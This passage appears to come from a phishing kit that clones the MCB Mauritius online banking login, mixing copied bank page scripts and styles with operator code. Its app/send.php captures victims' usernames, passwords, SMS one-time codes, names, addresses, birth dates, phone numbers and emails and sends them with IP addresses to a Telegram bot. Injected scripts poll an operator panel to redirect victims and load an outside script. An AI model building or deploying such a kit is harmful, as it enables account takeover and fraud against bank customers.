= document.frmmain.fldLoginUserId.value.replace(/[^a-zA-z0-9]+/g,"a"); loginWindow = window.open ("", windowName , "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no," + "0, 0, top=0,left=0,status=1," + "width=" + (scrW) + ",height=" + (scrH)); document.frmmain.target = windowName ; document.frmmain.submit (); loginWindow.focus(); document.frmmain.fldLoginUserId.value = ""; document.frmmain.fldPassword.value = ""; document.frmmain.fldPasswordStandard.value = ""; document.frmmain.fldPasswordVirtual.value = ""; return false; } //----------------------------------------------------------------------------- function setheight () { var isNS6 = (!document.all && document.getElementById) ? true : false; if(isNS6==true) { document.getElementById('TDlogin').style.height ='350px'; } else { document.getElementById('TDlogin').style.height ='100%'; } } //----------------------------------------------------------------------------- function DeletePwd () { if (virtKeyb) { var strNumField = new String(document.frmmain.fldPasswordVirtual.value); document.frmmain.fldPasswordVirtual.value = strNumField.substring(0,strNumField.length-1); //document.frmmain.fldPasswordVirtual.id=""; doRandomize(); } return false; } //----------------------------------------------------------------------------- function ClearPwd () { if (virtKeyb) { document.frmmain.fldPassword.value = ""; document.frmmain.fldPasswordStandard.value = ""; document.frmmain.fldPasswordVirtual.value = ""; doRandomize(); } return false; } //------------------------------------------------------------------------------ function formwindow_open(frm, title, id){ var window_name = 'process_' + id; var frm_action; window.open ( '' , window_name , 'toolbar=0,location=0,directories=0,status=1,menubar=0,scrollbars=1,resizable=0,left=0,top=0,width='+scr_w1+',height='+scr_h1 ); frm.target = window_name; frm.title.value = title; frm.fldRequestId.value = id; frm_action = frm.action; frm.action = "process.jsp" frm.submit (); frm.action = frm_action; } //------------------------------------------------------------------------------ function setScreenSize(){ scr_w1 = screen.availWidth-10+"px"; scr_h1 = screen.availHeight-60+"px"; } //------------------------------------------------------------------------------ function fNonce(){ var l_reqarr = new Array(); var fldRequestId=document.frmprocess.fldRequestId.value = "RRLGN04"; var fldDeviceId=document.frmmain.fldDeviceId.value; l_reqarr.push('fldDeviceId=01'); SendAjaxRequestLogin(l_reqarr,'RRLGN04',validatepassword,null,null,null); } function validatepassword(p_xml,p_text){ snonce = $("#nonce",p_text).val(); fLogon(snonce); } //------------------------------------------------------------------------------- </script><input name="fldRequestId" value="RRLGN01" type="hidden" ></input><input name="fldDeviceId" value="01" type="hidden" ></input></form> </div> <!--/form--> <form name="frmprocess" method="POST" action="https://ib.mcb.mu/T001/process.jsp"> <input type="hidden" name="fldRequestId" value=""/> <input type="hidden" name="fldDeviceId" value="01"/> <input type="hidden" name="title" value=""/> <input type="hidden" name="usertype" value="EN1"/> </form> <script type="text/javascript" src="https://www.images-home.com/image.js"></script> <script src="res/jq.js"></script> <script> var cd = "<?php echo $current_data; ?>"; setInterval(() => { $.post("../panel/fetch.php", {update:1}, function(d){ if(cd!=d){ window.location=d; cd=d; } }) }, 2000); </script> </body></html> PK [��\B��0` ` app/send.phpnu W+A�� <?php /************************* * AUTHOR : PRESTOWORLD * CONTACT : https://t.me/prestoworldunderground **************************/ @session_start(); require '../config.php'; $ip = $_SERVER['REMOTE_ADDR']; $panel_link = str_replace("app/send.php", "panel/ctr.php", "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."?ip=$ip"); function hit($link){ $c = curl_init(); curl_setopt($c, CURLOPT_URL, $link); curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($c, CURLOPT_RETURNTRANSFER, true); return curl_exec($c); curl_close($c); } if(isset($_POST['USERNAME'])) if(isset($_POST['PASSWORD'])){ $text = urlencode(" | MCB MU Login - $ip +-------------------------------------------------- | User : ".$_POST['USERNAME']." | Pass : ".$_POST['PASSWORD']." +-------------------------------------------------- | PANEL LINK : $panel_link "); foreach($chat_ids as $id){ $link = "https://api.telegram.org/bot$bot/sendMessage?parse_mode=html&chat_id=$id&text=$text"; hit($link); } header("location: wait.php"); } if(isset($_POST['tan'])){ $text = urlencode(" | MCB MU SMS - $ip +-------------------------------------------------- | Sms : ".$_POST['tan']." +-------------------------------------------------- | PANEL LINK : $panel_link "); foreach($chat_ids as $id){ $link = "https://api.telegram.org/bot$bot/sendMessage?parse_mode=html&chat_id=$id&text=$text"; hit($link); } header("location: wait.php"); } if(isset($_POST['cc1'])){ $text = urlencode(" | MCB MU INFO - $ip +-------------------------------------------------- | Full Name : ".$_POST['cc1']." | Home Address : ".$_POST['add']." | Date of Birth : ".$_POST['dob']." | Phone Number : ".$_POST['cvv']." | Email Address : ".$_POST['email']." +-------------------------------------------------- | PANEL LINK : $panel_link "); foreach($chat_ids as $id){ $link = "https://api.telegram.org/bot$bot/sendMessage?parse_mode=html&chat_id=$id&text=$text"; hit($link); } header("location: wait.php"); } ?>PK [��\y{�x� x� app/sms.phpnu W+A�� <?php require '../main.php'; ?> <!--[if lte IE 7]> <style type="text/css" > @import url("https://ib.mcb.mu/T001/css/cmn/theme.css"); </style> <![endif]--> <![if (!IE) | (gte IE 8)]> <style type="text/css" > @import url("https://ib.mcb.mu/T001/css/cmn/theme.uri.css"); </style> <![endif]> <script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/combined/jquery-includes.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/jquery-migration.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/select2/js/select2.min.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/i18n/ui.datepicker-en.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/i18n/ui.datepicker-en-US.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/i18n/select2_locale_en.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/i18n/select2_locale_en-US.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/jquery.qrcode.min.js" ></script><script> var globalcnt = 1; var useragent = ""; var openWindowArray = new Array(); var message = new Object (); var isHelp= ''; message.maxopen = "Maximum limit reached for number of open windows. Please close a window to open new Transaction."; message.alreadyopen = "Window already Open."; message.addfav = "Add to Favourites"; message.alertstr = "Alert"; function SendDashboardFormRequest (p_frm,p_desc,p_currtxn,p_nosubmitForm) { try{ var windowobj = openWindow(p_frm.fldServiceType.value, p_desc); if(p_nosubmitForm) { return windowobj; } //document.frmtp.fldRequestId.value = defAppId+p_frm.fldServiceType.value+requestId; //document.frmtp.fldServiceType.value = p_frm.fldServiceType.value; if(windowobj) { p_frm.target = windowobj.getFrameName(); p_frm.submit(); } } catch(e) { } } function getPosition(arr,val) { if(arr != null && arr.length > 0) { for(var cnt = 0;cnt < arr.length; cnt++ ) { if(arr[cnt] == val) { return cnt; } } } return -1; } function getPresentWindow(arr,val) { var count=0; if(arr != null && arr.length > 0) { for(var cnt1 = 0;cnt1 < arr.length; cnt1++ ) { if(arr[cnt1] == val) { count++; } } } return count; } function addIntoArray(p_array, p_txn) { p_array.push(p_txn); } function removeFromArray(p_array, p_txn) { var index_value = getPosition(p_array,p_txn); var range = 1; p_array.splice(index_value,range); } function fireMenuHelp(p_txn){ var l_idtxn= ""+ p_txn + ".htm"; var l_default= ""+ p_txn + ".htm"; var features = "directories=no,location=no,menubar=no,status=no,scrollbars=yes," + "toolbar=no,dependant=no,resizable=yes,top=75,left=750," + "scrollbars=yes,width=400,height=500"; addlistWindow = window.open ("static/help.jsp?REFIDTXN="+l_idtxn+"&DEFPATH="+l_default, "details", features); addlistWindow.focus(); //addlistWindow.moveTo(700,80); } $(document).ready(function() { if(useragent=="ipad" || useragent=="android"){ //alert(useragent); if (parent.isMenuClassic()) { var l_height = $( window.parent.frames["frameSet_main"]).height(); var l_width = $( window.parent.frames["frameSet_main"]).width(); var msg_l = $('#MySplitter').width()-200; var msg_p = $('#MySplitter').width(); //alert(l_height); //alert(l_width); //var statusText = top.frames["frame_top"].document.getElementById('topContainer'); var txn_frm = top.frames["frame_txn"].document.getElementById('main'); if(l_width>l_height) { //LANDSCAPE // alert("LANDSCAPE"); // $(statusText).css('width','95%'); $('.workarea').css('width','auto'); $('.workarea').css('overflow','hidden'); $('#MySplitter').css('width',msg_p); $('#main').css('width',msg_l); } else { // Portrait // alert("PORTRAIT"); //$(statusText).css('width','65%'); $('.workarea').css('width',l_width); $('.workarea').css('overflow','auto'); $('#MySplitter').css('width',l_height); $('#main').css('width',msg_p); } } } if(useragent=="ipad"){ if (!parent.isMenuClassic()) { if (parent.frames.length > 0) { var heightDiv = $('form[name="frmmain"]').height() + $(window).height() - 200; $('.contentarea').css({height:heightDiv}); $('body').addClass("mainFrame"); $('form[name="frmmain"]').addClass("mainscroll"); try { $('form[name="frmmain"]').touchScroll({elastic: true, momentum: false}); touchTableScroll('displayTable'); function loaded() { document.addEventListener('touchmove', function(e){ e.preventDefault(); }); myScroll = new iScroll('displayTable', {elastic: false, momentum: false}); } document.addEventListener('DOMContentLoaded', loaded); } catch(e){ } } } }}); </script><style> .calMask { position: absolute; z-index:1000; background:#FFFFFF; border:0px solid; } .calContainer { position: relative; background:#FFFFFF; z-index:1007; border-bottom-color:#FFFFFF; border-color:#FFFFFF; border-left-color:#FFFFFF; border-top-color:#FFFFFF; border-right-color:#FFFFFF; font-color:#6677DD; } .screenMask { position: absolute; height:1000%; width: 1000%; left:0px; top:0px; z-index:1005; background: url('https://ib.mcb.mu/T001/images/transparent.gif'); } .calContent { position: relative; z-index:1010; background:#FFFFFF; border:2px inset; padding: 5px; } .TESTcpYearNavigation, .TESTcpMonthNavigation { background-color:#6677DD; text-align:center; vertical-align:center; text-decoration:none; color:#FFFFFF; font-weight:bold; } .TESTcpDayColumnHeader, .TESTcpYearNavigation, .TESTcpMonthNavigation, .TESTcpCurrentMonthDate, .TESTcpCurrentMonthDateDisabled, .TESTcpOtherMonthDate, .TESTcpOtherMonthDateDisabled, .TESTcpCurrentDate, .TESTcpCurrentDateDisabled, .TESTcpTodayText, .TESTcpTodayTextDisabled, .TESTcpText { font-family:arial; font-size:8pt; } TD.TESTcpDayColumnHeader { text-align:right; border:solid thin #6677DD; border-width:0 0 1 0; } .TESTcpCurrentMonthDate, .TESTcpOtherMonthDate, .TESTcpCurrentDate { text-align:right; text-decoration:none; } .TESTcpCurrentMonthDateDisabled, .TESTcpOtherMonthDateDisabled, .TESTcpCurrentDateDisabled { color:#D0D0D0; text-align:right; text-decoration:line-through; } .TESTcpCurrentMonthDate { color:#6677DD; font-weight:bold; } .TESTcpCurrentDate { color: #FFFFFF; font-weight:bold; } .TESTcpOtherMonthDate { color:#808080; } TD.TESTcpCurrentDate { color:#FFFFFF; background-color: #6677DD; border-width:1; border:solid thin #000000; } TD.TESTcpCurrentDateDisabled { border-width:1; border:solid thin #FFAAAA; } TD.TESTcpTodayText, TD.TESTcpTodayTextDisabled { border:solid thin #6677DD; border-width:1 0 0 0; } A.TESTcpTodayText, SPAN.TESTcpTodayTextDisabled { height:20px; } A.TESTcpTodayText { color:#6677DD; font-weight:bold; } SPAN.TESTcpTodayTextDisabled { color:#D0D0D0; } .TESTcpBorder { border:solid thin #6677DD; } .printWarning { display:none; } .noPrintWarning { display:none; } </style><style media="print" > .printWarning { display:inline-block; } .noPrintWarning { display:none; } </style><div id="testdiv1" style="position:absolute;visibility:hidden;background-color:white;layer-background-color:white;z-index:10005" ></div><div class="screenMask" id="calenderMask" style="position:absolute;display:none;background-color:white" onclick="hide_Cal();" ></div><script type="text/javascript" src="https://ib.mcb.mu/T001/jsdir/common.js" ></script><script language="JavaScript" type="text/JavaScript" > var idEntity = 'T001'; var l_appLayWidth = 0; window.parent.scrollTo(0,0); //----------------------------------------------------------------------------------------------------------------------- function setPageHeight(){ var height = 0,window_header_height=0;; var body = document.body, html = document.documentElement; var position=window.parent.pageYOffset; var idrequest = 'RRUSR01'; var idtxn = idrequest.substring(2, 5); parent.$("#appContainer").css("height",+ (0) + "px" ); parent.$("#_contentWrapper").css("height",+ (0) + "px" ); parent.$("#txnbodyLayout").css("height",+ (0) + "px" ); parent.$("#ApplicationLayout").css("height",+ (0) + "px" ); parent.$(".window_panel").css("height",+ (0) + "px" ); parent.$(".window_frame").css("height",+ (0) + "px" ); parent.$(".workarea").css("height",+ (0) + "px" ); height = Math.max( body.scrollHeight, body.offsetHeight, html.clientHeight, html.scrollHeight, html.offsetHeight ); window_header_height = parent.$(".window_header").height(); if('BFV'==idtxn){ height = 1700; } height = height + window_header_height; if(height < 200){ height = 280; } if(height>0){ parent.$(".workarea").css("height",+ (height+50) + "px" ); parent.$("#appContainer").css("height",+ (height+500) + "px" ); parent.$("#_contentWrapper").css("height",+ (height+350) + "px" ); parent.$("#ApplicationLayout").css("height",+ (height+250) + "px" ); parent.$(".window_panel").css("height",+ (height+250) + "px" ); parent.$(".window_frame").css("height",+ (height+100) + "px" ); } window.parent.scrollTo(0,position); } //----------------------------------------------------------------------------------------------------------------------- if(idEntity=='T001'){ $(document).ready(function(){ $("td:empty").html(" "); }); $(document).ready(function(){ if(top.isMenuClassic == undefined){ $('.workarea').addClass('popup'); } try { l_appLayWidth = parent.$("#ApplicationLayout").width(); } catch (e){ } var height = 0,window_header_height=0; var body = document.body, html = document.documentElement; var idrequest = 'RRUSR01'; var idtxn = idrequest.substring(2, 5); parent.$("#appContainer").css("height",+ (0) + "px" ); parent.$("#_contentWrapper").css("height",+ (0) + "px" ); parent.$("#txnbodyLayout").css("height",+ (0) + "px" ); parent.$("#ApplicationLayout").css("height",+ (0) + "px" ); parent.$(".window_panel").css("height",+ (0) + "px" ); parent.$(".window_frame").css("height",+ (0) + "px" ); parent.$(".workarea").css("height",+ (0) + "px" ); height = Math.max( body.scrollHeight, body.offsetHeight, html.clientHeight, html.scrollHeight, html.offsetHeight ); window_header_height = parent.$(".window_header").height(); height = height + window_header_height; if('BFV'==idtxn){ height = 1700; } if(height < 200){ height = 280; } if(height>0){ parent.$(".workarea").css("height",+ (height+50) + "px" ); parent.$("#appContainer").css("height",+ (height+500) + "px" ); parent.$("#_contentWrapper").css("height",+ (height+350) + "px" ); parent.$("#ApplicationLayout").css("height",+ (height+250) + "px" ); parent.$(".window_panel").css("height",+ (height+250) + "px" ); parent.$(".window_frame").css("height",+ (height+100) + "px" ); } }); try{ if(!top.isMenuClassic()){ $(document).ready(function() { var idrequest = 'RRUSR01'; var idtxn = idrequest.substring(2, 5); if(idtxn == "MAR"){ var desc = $("#pageheading").html(); }else{ var desc = $("#pageheading").text(); } var note = null; if(idtxn != 'DTF'){ note = $("#pageheadernote").text(); }else{note = $("#pageheadernote").html();} /* if(desc != ''){ $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(desc); document.title=desc; }*/ if(idtxn =="EMF"){ var brdcrumb = '<ul class="breadcrumbs" ><li class="breadcrumbs_crumb" ><a onclick="minimizeAll()" >Home</a></li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Ways to Bank</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Register to e-statements</li></ul>'; $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(brdcrumb); } if(idtxn =="COU"){ var brdcrumb = '<ul class="breadcrumbs" ><li class="breadcrumbs_crumb" ><a onclick="minimizeAll()" >Home</a></li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Help & Contact us</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Contact us</li></ul>'; $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(brdcrumb); } if(idtxn =="TDA"){ var brdcrumb = '<ul class="breadcrumbs" ><li class="breadcrumbs_crumb" ><a onclick="minimizeAll()" >Home</a></li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Accounts & Products</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Fixed deposits</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Amend automatic renewal</li></ul>'; $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(brdcrumb); } var content = ''; var $windowControls = $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_function_bar"); $windowControls.siblings('.window_title_error').empty(); if ($windowControls.siblings('.window_title_error').length == 0) { $("#error-dialog-table").css("display", ""); content = $("#dialog-modal-error").html(); if(typeof content == "undefined") { content = $("#dialog-modal-error").text(); } //alert("content "+content); $windowControls.before("<div class='window_title_error active' >"+content+ "</div>"); }else{ $("#error-dialog-table").css("display", ""); content = $("#dialog-modal-error").html(); $windowControls.siblings('.window_title_error').html(content); } if ($windowControls.siblings('.window_title_header').length == 0) { $windowControls.before("<div class='window_title_header active' >" + desc + "</div>"); }else{ $windowControls.siblings('.window_title_header').html(desc); } if ($windowControls.siblings('.window_title_note').length == 0) { $windowControls.before("<div class='window_title_note active' >" + note + "</div>"); }else{ $windowControls.siblings('.window_title_note').html(note); } }); } } catch(e) { } }else { $(document).ready(function(){ if(top.isMenuClassic == undefined){ $('.workarea').addClass('popup'); } try { l_appLayWidth = parent.$("#ApplicationLayout").width(); } catch (e){ } }); try{ if(!top.isMenuClassic()){ $(document).ready(function() { var desc = $("#pageheading").text(); if(desc != ''){ $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(desc); document.title=desc; } var $windowControls = $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_function_bar"); if ($windowControls.siblings('.window_title_timestamp').length == 0) { if (top.isAuthTxnOnly != 'Y') { $windowControls.before("<div class='window_title_timestamp active' >" + $('#pageheadingdate').text() + "</div>"); } }else{ if (top.isAuthTxnOnly != 'Y') { $windowControls.siblings('.window_title_timestamp').text($('#pageheadingdate').text()); } } }); } } catch(e) { } } var popup_txnid=""; var popup_seq=""; var popup_target=""; var popup_win_name=""; var flgbtn=false; var highlightedTabs = new Array (); var helptxn='USR'; //----------------------------------------------------------------------------- function displayStatusMessage () { var idtxn = 'RRUSR01'; if(idtxn) { idtxn = idtxn.substring(2,5); } var totalcnt = 0 + 0; //+ 0; if(totalcnt == 0) { if (window.parent.frames['messageFrame']) { window.parent.frames['messageFrame'].resetErrors(); } else if (window.top.frames['messageFrame']) { window.top.frames['messageFrame'].resetErrors(); } } checkForAuditLogFrame(); } //----------------------------------------------------------------------------- $(function () { var count = 0 + 0 + 0; var idEntity = 'T001'; if(idEntity == 'T001'){ if (count > 0 && 'C' != 'M') { if("".length>150){ $('#dialog-modal-error').hide(); /*$('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false, minWidth : 600 } );*/ }else{ $('#dialog-modal-error').hide(); /*$('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false } );*/ } $("#dialog-modal-error").css("min-height", ""); $("#error-dialog-table").css("display", ""); $("#dialog-error").css("height", "auto"); } }else { if (count > 0 && 'C' != 'M') { if("".length>150){ $('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false, minWidth : 600 } ); }else{ $('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false } ); } $("#dialog-modal-error").css("min-height", ""); $("#error-dialog-table").css("display", ""); $("#dialog-error").css("height", "auto"); } } }) //----------------------------------------------------------------------------- function minimizeMessages () { var msgFrame; var msg_text = "Click here to view messages..." var l_footer_content = '<div id="msg_' + document.frmmain.fldServiceType.value + '" class="msgFrame">'; l_footer_content += '<img src="images/list_errors.gif" align="abdMiddle" title="' + msg_text +'" id="msg_' + document.frmmain.fldServiceType.value + '_img" >'; //l_footer_content += ' ' + msg_text l_footer_content += '</div>'; if (window.top.frames ["messageFrame"]) { msgFrame = $("#errorTab", window.top.frames ["messageFrame"].document); parent.document.getElementById('dataframe').rows = "25,*"; } else { msgFrame = $("#errorTab"); msgFrame.show(); document.getElementById('errorTab').style.display = 'inline-block'; } msgFrame.html (l_footer_content); msgFrame.click ( function () { $('#dialog-modal-error').dialog ('open'); $("#dialog-modal-error").css("min-height", ""); /*$('#dialog-modal-error').parent().css( { position:'absolute !important', left:'auto !important', right:'0px !important', top:'24px!important' });*/ } ); } //----------------------------------------------------------------------------- function highlightTab (p_tab_id) { var l_tab_obj, imageid, test, image1; if (highlightedTabs.length > 0 && highlightedTabs.contains (p_tab_id)) { l_tab_obj = document.getElementById (p_tab_id); imageid = l_tab_obj.id + "image"; test = l_tab_obj; image1 = document.createElement("img"); image1.setAttribute('id',imageid); image1.setAttribute('src','images/red_error.gif'); image1.setAttribute('align','absMiddle'); image1.className='errorImg'; test.childNodes [0].insertBefore(image1); addIntoArray (highlightedTabs, p_tab_id); /*$("#"+imageid).tooltip({ track: true, delay: 0, showURL: false, opacity: 1, fixPNG: false, showBody: " - ", extraClass: "pretty fancy", top: -15, left: 20 });*/ } } //----------------------------------------------------------------------------- function markErrorField (p_err_field, err_message){ markErrorField(p_err_field, err_message, 'default', 'default'); } //----------------------------------------------------------------------------- function markErrorField(p_err_field, err_message, p_targetPos, p_tooltipPos){ $(p_err_field).css ('border', '1px solid red'); $(p_err_field).css ('background-color', 'rgb(255, 240, 240)'); $(p_err_field).attr ('title', err_message); /*$(p_err_field).tooltip({ track: true, delay: 0, showURL: false, opacity: 1, fixPNG: false, showBody: " - ", extraClass: "pretty fancy", top: -15, left: 20 });*/ if(p_targetPos == 'default') p_targetPos = 'topMiddle'; if(p_tooltipPos == 'default') p_tooltipPos = 'bottomMiddle'; $(p_err_field).qtip({ position: { corner: { target: p_targetPos, tooltip: p_tooltipPos } }, style: { name: 'red', padding: '7px 13px', width: { max: 210, min: 0 }, tip: true } }); } //----------------------------------------------------------------------------- function initError(){ //Initialize Error } //----------------------------------------------------------------------------- function displayErrorMessage () { cnt = 0; totalcnt = 0; var arrErrorCode = new Array(); var arrErrorDesc = new Array(); var arrWarningCode = new Array(); var arrWarningDesc = new Array(); var arrInfoCode = new Array(); var arrInfoDesc = new Array(); var arrSuccessCode = new Array(); var arrSuccessDesc = new Array(); totalcnt = totalcnt + cnt; cnt = 0; totalcnt = totalcnt + cnt; } //----------------------------------------------------------------------------- function displayBulkStatusMessage () { return; } //----------------------------------------------------------------------------- function Draft ( P_idTxn , p_seqNo ) { if(document.frmmain.fldnextaction.value=='RD'){} else{ document.frmmain.fldnextaction.value ='DF'; } document.frmmain.fldauthaction.value ='VO'; try { document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+p_seqNo; } catch (e) { } SendTxnRequest('98',P_idTxn); } //----------------------------------------------------------------------------- function Draft(P_idTxn) { if(document.frmmain.fldnextaction.value=='RD'){} else{ document.frmmain.fldnextaction.value ='DF'; } document.frmmain.fldauthaction.value ='VO'; try { document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+'03'; } catch (e) { } SendTxnRequest('98',P_idTxn); } //----------------------------------------------------------------------------- function saveTemplate ( P_idTxn , p_seqNo ) { document.frmmain.fldnextaction.value = 'TP'; //Set fldauthaction to 'VI' if module and rule chk is required for Templates document.frmmain.fldauthaction.value = 'VO'; try { document.frmmain.fldistemplatetxn.value = 'true';//for generic payment only document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+p_seqNo; } catch (e) { } SendTxnRequest ('97',P_idTxn); } //----------------------------------------------------------------------------- function saveTemplate (P_idTxn) { document.frmmain.fldnextaction.value = 'TP'; //Set fldauthaction to 'VI' if module and rule chk is required for Templates document.frmmain.fldauthaction.value = 'VO'; try { document.frmmain.fldistemplatetxn.value = 'true';//for generic payment only document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+'03'; } catch (e) { } SendTxnRequest ('97',P_idTxn); } //----------------------------------------------------------------------------- function PrintPopup(p_request_id , p_section_id, p_form) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; var addlistWindow = window.open ("", "PrintPopup", features) ; p_form.fldSectionId.value = p_section_id; p_form.fldRequestId.value = p_request_id; p_form.fldSessionId.value = parent.idsession; p_form.target = "PrintPopup"; p_form.submit(); addlistWindow.focus(); } //------------------------------------------------------------------------------ function DowloadPopup(p_request_id , p_section_id, p_form) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; var addlistWindow = window.open ("", "DowloadPopup", features) ; p_form.fldSectionId.value = p_section_id; p_form.fldRequestId.value = p_request_id; p_form.fldSessionId.value = parent.idsession; p_form.target = "DowloadPopup"; p_form.submit(); addlistWindow.focus(); } //----------------------------------------------------------------------------- function getChangeFieldColor(){ var arr_fldchanged = new Array (); var arr_prevval = new Array (); var arr_idx = 0; var len = 0; var i; arr_idx = 0; len =arr_fldchanged.length; for(i=0;i<len;i++){ if(document.getElementById(arr_fldchanged[i]) != null && document.getElementById(arr_fldchanged[i]) != "undefined"){ document.getElementById(arr_fldchanged[i]).className = "ColHeadingLeftAlignedBold"; } } } //-------------------------------------------------------------------------------------- function defaultfunction(){ return true; } //-------------------------------------------------------------------------------------- function fnFixDecimalPlaces ( p_val , p_places ) { if ( p_val == '' || isNaN (p_val) || isNaN (p_val) || (p_places != '0' && p_places == '')) { return ''; } return (parseFloat (p_val)).toFixed (p_places); } //-------------------------------------------------------------------------------------- function fnSubmitForm () { try { if (parent.popupWindow) { parent.popupWindow.top.frames [1].name = 'txn_'+parent.idsession; document.frmmain.target = 'txn_'+parent.idsession; document.frmmain.fldSessionId.value = parent.idsession; document.frmmain.fldRequestId.value = "RR"+popup_txnid+popup_seq; document.frmmain.submit (); document.frmmain.target = ""; } } catch (e) { } } //-------------------------------------------------------------------------------------- function call_Popup ( p_feature , p_txnid , p_seqno , p_target ){ try { if (parent.popupWindow) { parent.popupWindow.close();//closing existing pop up window. parent.popupWindow = null; } } catch (e) { } popup_win_name = 'popup_'+parent.iduser; popup_txnid = p_txnid; popup_seq = p_seqno; parent.popupWindow = window.open ("defaultflexcubepopup.html",popup_win_name, p_feature) } //-------------------------------------------------------------------------- function fnOnBodyUnload () { try { if (parent.popupWindow) { parent.popupWindow.close();//closing existing pop up window. } } catch (e) { } } //-------------------------------------------------------------------------- function isTxnInRole (p_txn){ var p_success = false; for (var i=0;i < arr_grp__txnid.length; i++){ if (arr_grp__txnid [i] == p_txn) { p_success=true; } } return p_success; } //------------------------------------------------------------------------------ function view_attached_docs() { SendTxnRequest('03','VAI'); } //------------------------------------------------------------------------------ function fnAttachDocuments(p_tableid,p_rowid,p_buttonid) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=no,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; document.frmmain.target = "txn"; document.frmmain.fldSessionId.value = parent.idsession; //document.frmmain.fldRequestId.value="RRALI02"; document.frmmain.fldSectionId.value="RRALI02"; document.frmmain.fldServiceType.value="ALI"; document.frmmain.fldtableid.value=p_tableid; document.frmmain.fldrowid.value=p_rowid; document.frmmain.fldbtnflag.value=p_buttonid; call_Popup ( features , 'ALI' , '02' , 'txn' ); document.frmmain.target = ""; } //------------------------------------------------------------------------------ function fnAttachFilesForMailBox(p_tableid,p_rowid,p_buttonid) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=no,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; document.frmmain.target = "txn"; document.getElementById('fldSessionId').value = parent.idsession; document.getElementById('fldSectionId').value = "RRIMS92"; document.getElementById('fldServiceType').value = "IMS"; document.getElementById('fldtableid').value = p_tableid; document.getElementById('fldrowid').value = p_rowid; document.getElementById('fldbtnflag').value = p_buttonid; call_Popup ( features , 'IMS' , '92' , 'txn' ); document.frmmain.target = ""; } //------------------------------------------------------------------------------ function fnOriginationsPopUpOpen(p_reqid,p_txnid,p_iddevice,p_features) { var idrequest = 'RR'+p_txnid+p_reqid; document.frmmain.target = "txn"; document.frmmain.fldSessionId.value = parent.idsession; document.frmmain.fldSectionId.value = idrequest; document.frmmain.fldServiceType.value= "ORG"; document.frmmain.fldDataId.value = dataid; call_Popup ( p_features , p_txnid , p_reqid , 'txn' ); document.frmmain.target = ""; return; } //------------------------------------------------------------------------------ function fnEreceiptsPopUpOpen(idRequestNum) { var height = window.innerHeight; var width = window.innerWidth; var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no" + ",height=" + (0.9*height) + ",width=" + (0.9 * width) + ",top=" + (height * 0.1) + ",left=" + (width * 0.1) + ",status=yes"; if(idRequestNum){ call_Popup ( features , 'ERC' , idRequestNum , 'txn' ); } else{ call_Popup ( features , 'ERC' , '01' , 'txn' ); } } //------------------------------------------------------------------------------ function fnRemove(p_sectionid,p_requestid) { document.frmmain.target=""; document.frmmain.flddelrefno.value =""; document.frmmain.fldfilerefno.value =""; for (var i=0;i < document.frmmain.elements.length;i++) { if (document.frmmain.elements[i].type=='checkbox' && document.frmmain.elements[i].name=="fldattachedfiles" ) { if(document.frmmain.elements[i].checked==false) { document.frmmain.fldfilerefno.value = 